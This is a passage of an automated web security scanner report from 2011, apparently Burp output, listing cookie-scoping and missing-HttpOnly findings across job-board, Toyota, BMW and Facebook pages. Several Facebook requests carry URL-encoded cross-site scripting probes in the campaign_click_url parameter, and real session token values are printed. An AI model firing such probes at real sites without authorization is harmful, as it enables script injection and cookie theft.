The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/banner/lc_bannerforjdj125x125.gif/ HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.10. http://www.lawcrossing.com/lcjssearchresults.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.lawcrossing.com
Path:	/lcjssearchresults.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PHPSESSID=e5iouh0ohr4puh7rj3ce3m03n5; path=/; domain=lawcrossing.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lcjssearchresults.php HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.11. http://www.lawcrossing.com/salarysurvey/lcsalarysurvey.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.lawcrossing.com
Path:	/salarysurvey/lcsalarysurvey.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PHPSESSID=7ru8l85l763haf7r7bf41h50d6; path=/; domain=lawcrossing.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /salarysurvey/lcsalarysurvey.php HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.12. http://www.legalauthority.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.legalauthority.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

PHPSESSID=itiitg0ro0btc7r4bgoq60nao3; path=/; domain=.legalauthority.com
LA_RUSH_ORDER=deleted; expires=Thu, 21-Jan-2010 19:41:21 GMT; path=/; domain=.legalauthority.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.legalauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.13. http://www.legalauthority.com/signup.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.legalauthority.com
Path:	/signup.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PHPSESSID=6g5f9o9lenr88jd1ft2nnmijv6; path=/; domain=.legalauthority.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /signup.php HTTP/1.1
Host: www.legalauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:19 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=6g5f9o9lenr88jd1ft2nnmijv6; path=/
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: public
Pragma: no-cache
Set-Cookie: PHPSESSID=6g5f9o9lenr88jd1ft2nnmijv6; path=/; domain=.legalauthority.com
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 56091

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Legal Recruiter, Law Student Job, Legal Employers, Legal Search Firm, Attorney Jobs . Legal Authority</title
...[SNIP]...

9.14. http://www.opensource.org/licenses/gpl-license.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.opensource.org
Path:	/licenses/gpl-license.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=lrk48den811joe12r90meb8233; expires=Sun, 13-Feb-2011 23:26:19 GMT; path=/; domain=.opensource.org

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/gpl-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:52:59 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=lrk48den811joe12r90meb8233; expires=Sun, 13-Feb-2011 23:26:19 GMT; path=/; domain=.opensource.org
Last-Modified: Fri, 21 Jan 2011 19:47:06 GMT
ETag: "137d5aff6fab07cd18eb3b969e04675a"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Content-Length: 7271
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

9.15. http://www.opensource.org/licenses/mit-license.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.opensource.org
Path:	/licenses/mit-license.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=3n29fortk8c5osv64jmeft3qn7; expires=Sun, 13-Feb-2011 22:18:26 GMT; path=/; domain=.opensource.org

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:45:06 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=3n29fortk8c5osv64jmeft3qn7; expires=Sun, 13-Feb-2011 22:18:26 GMT; path=/; domain=.opensource.org
Last-Modified: Fri, 21 Jan 2011 18:31:08 GMT
ETag: "f3ee3970abd9b05424adb4d6b0250644"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

9.16. http://www.resumeboomer.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.resumeboomer.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PHPSESSID=rflo577r2gvrm7p49d1ei6a8c1; path=/; domain=resumeboomer.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.resumeboomer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.17. http://www.toyota.com/byt/pub/init.do previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.toyota.com
Path:	/byt/pub/init.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

JSESSIONID_BYT=FmnKN5JDVH1LwGnr9JLPLgMFhjMmjSgmvGhSQhD8ths2YbvThLTq!-1855535020; domain=.toyota.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /byt/pub/init.do HTTP/1.1
Host: www.toyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=ISO-8859-1
Expires: Fri, 21 Jan 2011 18:45:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 21 Jan 2011 18:45:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID_BYT=FmnKN5JDVH1LwGnr9JLPLgMFhjMmjSgmvGhSQhD8ths2YbvThLTq!-1855535020; domain=.toyota.com; path=/
Content-Length: 38510

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

9.18. http://www.answers.com/topic/vinson-elkins-llp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.answers.com
Path:	/topic/vinson-elkins-llp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

settings=ver||fayt|1|ate|1|tabOrder|default|home|1; Domain=.answers.com; Expires=Sat, 21-Jan-2012 18:39:52 GMT; Path=/
settingsS=ver||fayt|1|ate|1|tabOrder|default|home|1; Domain=.answers.com; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /topic/vinson-elkins-llp HTTP/1.1
Host: www.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.19. http://www.buyatoyota.com/NationalLanding.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.buyatoyota.com
Path:	/NationalLanding.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

bgImage=Toyotathon_Flash_Piece; domain=.buyatoyota.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /NationalLanding.aspx HTTP/1.1
Host: www.buyatoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.20. http://www.facebook.com/BMWUSA previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/BMWUSA

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

lsd=EvrQb; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BMWUSA HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=85x21; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Djdjournal.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.jdjournal.com%252F2011%252F01%252F19%252Ffour-partners-from-vinson-elkins-join-gibson-dunn%252F%253F750aa%2527%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E9dfc99fca36%253D1%26extra_2%3DUS;

Response

9.21. http://www.facebook.com/EmploymentXing previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/EmploymentXing

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

lsd=Z_NLA; path=/; domain=.facebook.com
reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2FEmploymentXing; path=/; domain=.facebook.com
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FEmploymentXing; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /EmploymentXing HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=557x557; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Djd2b.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.jd2b.com%252F%253Ff05bd%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253Ecf651820abc%253D1%26extra_2%3DUS;

Response

9.22. http://www.facebook.com/campaign/impression.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/campaign/impression.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Djdjournal.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.jdjournal.com%252F2011%252F01%252F19%252Ffour-partners-from-vinson-elkins-join-gibson-dunn%252F%253F750aa%2527%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E9dfc99fca36%253D1%26extra_2%3DUS; expires=Sun, 20-Feb-2011 18:46:47 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/impression.php?campaign_id=137675572948107&partner_id=jdjournal.com&placement=like_button&extra_1=http%3A%2F%2Fwww.jdjournal.com%2F2011%2F01%2F19%2Ffour-partners-from-vinson-elkins-join-gibson-dunn%2F%3F750aa%27%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E9dfc99fca36%3D1&extra_2=US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?href=http://www.jdjournal.com/&layout=standard&show_faces=true&width=450&action=like&font=arial&colorscheme=light&height=80
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dtheclicker.todayshow.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Ftheclicker.todayshow.com%252F%253F28d8a%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E1b20a3de4c0%253D1%26extra_2%3DUS; wd=85x21

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 43
Content-Type: image/gif
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Djdjournal.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.jdjournal.com%252F2011%252F01%252F19%252Ffour-partners-from-vinson-elkins-join-gibson-dunn%252F%253F750aa%2527%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E9dfc99fca36%253D1%26extra_2%3DUS; expires=Sun, 20-Feb-2011 18:46:47 GMT; path=/; domain=.facebook.com; httponly
X-Cnection: close
Date: Fri, 21 Jan 2011 18:46:47 GMT

GIF89a.............!.......,...........D..;

9.23. http://www.facebook.com/campaign/landing.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/campaign/landing.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

campaign_click_url=%2Fcampaign%2Flanding.php; expires=Sun, 20-Feb-2011 19:34:37 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/landing.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=85x21; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Djdjournal.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.jdjournal.com%252F2011%252F01%252F19%252Ffour-partners-from-vinson-elkins-join-gibson-dunn%252F%253F750aa%2527%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E9dfc99fca36%253D1%26extra_2%3DUS;

Response

HTTP/1.1 302 Found
Location: http://www.facebook.com/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: campaign_click_url=%2Fcampaign%2Flanding.php; expires=Sun, 20-Feb-2011 19:34:37 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Fri, 21 Jan 2011 19:34:37 GMT
Content-Length: 0

9.24. http://www.facebook.com/pages/JD2B/298408284363 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/JD2B/298408284363

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

lsd=jal5o; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pages/JD2B/298408284363 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=557x557; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Djd2b.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.jd2b.com%252F%253Ff05bd%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253Ecf651820abc%253D1%26extra_2%3DUS;

Response

9.25. http://www.facebook.com/piyush.v.bhatt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/piyush.v.bhatt

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

lsd=WABbM; path=/; domain=.facebook.com
reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpiyush.v.bhatt; path=/; domain=.facebook.com
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpiyush.v.bhatt; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /piyush.v.bhatt HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=557x557; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Djd2b.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.jd2b.com%252F%253Ff05bd%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253Ecf651820abc%253D1%26extra_2%3DUS;

Response

9.26. http://www.facebook.com/profile.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/profile.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

lsd=pcnfa; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /profile.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=557x557; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Djd2b.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.jd2b.com%252F%253Ff05bd%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253Ecf651820abc%253D1%26extra_2%3DUS;

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=pcnfa; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Fri, 21 Jan 2011 22:26:32 GMT
Content-Length: 0

9.27. http://www.facebook.com/yahoonews previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/yahoonews

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

lsd=cDsiN; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /yahoonews HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=85x21; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Djdjournal.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.jdjournal.com%252F2011%252F01%252F19%252Ffour-partners-from-vinson-elkins-join-gibson-dunn%252F%253F750aa%2527%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E9dfc99fca36%253D1%26extra_2%3DUS;

Response

10. Cookie without HttpOnly flag set previous next
There are 446 instances of this issue:

http://www.100kcrossing.com/
http://www.accountingcrossing.com/
http://www.accountmanagementcrossing.com/
http://www.actuarialcrossing.com/
http://www.admincrossing.com/
http://www.advertisingcrossing.com/
http://www.aerospacecrossing.com/
http://www.agriculturalcrossing.com/
http://www.aharrisonbarnes.com/
http://www.aharrisonbarnes.com/contact-us/script/functions.js
http://www.aharrisonbarnes.com/do-not-stop-seeing-opportunity-step-outside-your-minds-comfort-zone-and-begin-to-dream/
http://www.aharrisonbarnes.com/hb-course/
http://www.aharrisonbarnes.com/push-yourself-outside-your-comfort-zone/
http://www.aharrisonbarnes.com/wp-content/plugins/drop-caps/'dropcaps-no-ie.css'%20screen
http://www.answers.com/topic/vinson-elkins-llp
http://www.architecturecrossing.com/
http://www.attorneyresume.com/
http://www.auditorcrossing.com/
http://www.automotivecrossing.com/
http://www.aviationcrossing.com/
http://www.bcgsearch.com/
http://www.bcgsearch.com/browsejobs.php
http://www.bcgsearch.com/searchresults.php
http://www.bilingualcrossing.com/
http://www.biotechcrossing.com/
http://www.bluecollarcrossing.com/
http://www.businessanalystcrossing.com/
http://www.businessdevelopmentcrossing.com/
http://www.callcentercrossing.com/
http://www.chefcrossing.com/
http://www.civilengineeringcrossing.com/
http://www.clevelcrossing.com/
http://www.clinicalresearchcrossing.com/
http://www.compliancecrossing.com/
http://www.computeraideddesigncrossing.com/
http://www.constructioncrossing.com/
http://www.consultingcrossing.com/
http://www.contractmanagementcrossing.com/
http://www.counselingcrossing.com/
http://www.cpluspluscrossing.com/
http://www.customerservicecrossing.com/
http://www.dbacrossing.com/
http://www.dentalcrossing.com/
http://www.designingcrossing.com/
http://www.directstartv.com/
http://www.diversitycrossing.com/
http://www.dotnetcrossing.com/
http://www.ecommercecrossing.com/
http://www.edfed.com/
http://www.editingcrossing.com/
http://www.educationcrossing.com/
http://www.employmentauthority.com/
http://www.employmentcrossing.com/
http://www.energycrossing.com/
http://www.engineeringcrossing.com/
http://www.entrylevelcrossing.com/
http://www.environmentalcrossing.com/
http://www.environmentalsafetyhealthcrossing.com/
http://www.erpcrossing.com/
http://www.execcrossing.com/
http://www.facilitiescrossing.com/
http://www.financialservicescrossing.com/
http://www.foodservicescrossing.com/
http://www.fundraisingcrossing.com/
http://www.giscrossing.com/
http://www.governmentcrossing.com/
http://www.graduateschoolloans.com/
http://www.healthcarecrossing.com/
http://www.helpdeskcrossing.com/
http://www.hospitalitycrossing.com/
http://www.hound.com/
http://www.hound.com/gjsearchresult.php
http://www.hrcrossing.com/
http://www.hvaccrossing.com/
http://www.informationtechnologycrossing.com/
http://www.insurcrossing.com/
http://www.intellectualpropertycrossing.com/
http://www.internshipcrossing.com/
http://www.j2eecrossing.com/
http://www.journalismcrossing.com/
http://www.lawcrossing.com/
http://www.lawcrossing.com/article/6070/Brooklyn-Law-School/
http://www.lawcrossing.com/article/6154/Anne-Healy-LIDS/
http://www.lawcrossing.com/images/banner/lc_bannerforjdj125x125.gif/
http://www.lawcrossing.com/lcjssearchresults.php
http://www.lawcrossing.com/salarysurvey/lcsalarysurvey.php
http://www.lawfirmstaff.com/
http://www.lawschoolloanreport.org/
http://www.lawschoolloans.com/
https://www.lawschoolloans.com/lslprivateloan_application.php
http://www.legalauthority.com/
http://www.legalauthority.com/signup.php
http://www.legalauthority.com/tmlandingpage.php
http://www.legalauthority.com/tmviewbanner.php
http://www.legalauthorityfinancial.com/
http://www.logisticscrossing.com/
http://www.managercrossing.com/
http://www.manufacturingcrossing.com/
http://www.marketingcrossing.com/
http://www.mediajobcrossing.com/
http://www.medicalschoolloans.com/
http://www.militarycrossing.com/
http://www.nursingcrossing.com/
http://www.occupationaltherapycrossing.com/
http://www.opensource.org/licenses/gpl-license.php
http://www.opensource.org/licenses/mit-license.php
http://www.operationscrossing.com/
http://www.parttimecrossing.com/
http://www.pharmaceuticalcrossing.com/
http://www.physicalsecuritycrossing.com/
http://www.physicaltherapycrossing.com/
http://www.planningcrossing.com/
http://www.postdoctoralfellowcrossing.com/
http://www.prcrossing.com/
http://www.preferredresumes.com/
http://www.procurementcrossing.com/
http://www.productmanagercrossing.com/
http://www.projectmanagementcrossing.com/
http://www.publicinterestcrossing.com/
http://www.publishingcrossing.com/
http://www.purchasingcrossing.com/
http://www.qaqccrossing.com/
http://www.radiocrossing.com/
http://www.realestateandlandcrossing.com/
http://www.recruitingcrossing.com/
http://www.researchingcrossing.com/
http://www.resumeboomer.com/
http://www.retailcrossing.com/
http://www.sciencescrossing.com/
http://www.scientistcrossing.com/
http://www.sellingcrossing.com/
http://www.sqlcrossing.com/
http://www.teenagercrossing.com/
http://www.telecomcrossing.com/
http://www.toyota.com/byt/pub/init.do
http://www.toyota.com/owners/apps/maintenance-guides.do
http://www.toyota.com/owners/apps/manuals.do
http://www.tradingcrossing.com/
http://www.trainingcrossing.com/
http://www.transportationcrossing.com/
http://www.travelingcrossing.com/
http://www.truckingcrossing.com/
http://www.tvcrossing.com/
http://www.underwritingcrossing.com/
http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP
http://www.veterinarycrossing.com/
http://www.volunteercrossing.com/
http://www.workathomecrossing.com/
http://www.writingcrossing.com/
http://www.bmwusa.com/
http://www.bmwusa.com/
http://www.bmwusa.com/Error_Cookieless.aspx
http://www.bmwusa.com/ScriptResource.axd
http://www.bmwusa.com/WebResource.axd
http://www.bmwusa.com/default.aspx
http://www.bmwusa.com/favicon.ico
http://www.bmwusa.com/jsenvconst.ashx
http://www.bmwusa.com/standard/content/vehicles/2011/1/128iconvertible/1seriesconvertiblemediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/1/128iconvertible/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/1/128iconvertible/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/1/128iconvertible/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/1/128icoupe/1seriescoupemediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/1/128icoupe/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/1/128icoupe/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/1/128icoupe/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/1/135iconvertible/1seriesconvertiblemediagallery.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/1/135iconvertible/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/1/135iconvertible/features_and_specs/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/1/135iconvertible/modelhighlights/default.aspx
http://www.bmwusa.com/standard/content/vehicles/2011/1/135icoupe/1seriescoupemediagallery.aspx
